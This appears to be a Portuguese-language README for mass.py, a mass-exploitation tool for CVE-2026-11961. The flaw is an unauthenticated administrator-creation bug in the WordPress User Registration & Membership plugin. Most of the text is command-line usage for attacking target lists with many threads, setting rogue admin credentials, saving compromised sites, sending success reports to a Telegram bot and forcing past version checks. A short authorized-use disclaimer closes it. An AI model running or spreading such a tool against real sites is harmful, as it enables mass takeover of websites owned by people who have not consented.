
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalação de Privilégios. Funções de Associação mal configuradas → Criação de Administrador Não Autenticado → Comprometimento do Site. CVSS 8.1
Ferramenta de exploit em massa para CVE-2026-11961 que afeta o plugin User Registration & Membership do WordPress.
--force)# Show help
python3 mass.py -h
# Single target
python3 mass.py -u https://target.com
# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Multiple targets
python3 mass.py -l targets.txt -t 20
# Save successful results
python3 mass.py -l targets.txt -o results.jsonl
# Write log file
python3 mass.py -l targets.txt --log exploit.log
# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Force mode
python3 mass.py -u https://target.com --force
| Option | Description |
|---|---|
-h, --help | Exibe a mensagem de ajuda e sai |
-u, --url | URL do alvo único |
-l, --list | Arquivo contendo URLs de alvos (uma por linha) |
--username | Nome de usuário do administrador (padrão: gerado aleatoriamente) |
--password | Senha do administrador (padrão: gerada aleatoriamente) |
-t, --threads | Número de threads simultâneas (padrão: 5) |
--timeout | Tempo limite de solicitação em segundos (padrão: 15) |
-o, --output | Salva os resultados bem-sucedidos em um arquivo JSONL |
--log | Salva os logs do console em um arquivo |
--proxy | Proxy HTTP/HTTPS (ex.: http://127.0.0.1:8080) |
--force | Ignora a validação de versão e continua o processamento |
--tg-token | Token do Bot do Telegram |
--tg-chat | ID do Chat do Telegram |
Este projeto é fornecido exclusivamente para avaliações de segurança autorizadas, pesquisa defensiva de segurança e validação de vulnerabilidades.
Ao utilizar este software, você confirma que possui autorização explícita para avaliar os sistemas-alvo. O acesso não autorizado a sistemas de computador é proibido e pode violar as leis aplicáveis.
O autor e os colaboradores não incentivam nem toleram o uso não autorizado deste projeto e não assumem nenhuma responsabilidade ou obrigação por qualquer uso indevido, dano ou consequências legais decorrentes de seu uso.
JohenLastGen JLG NETWORK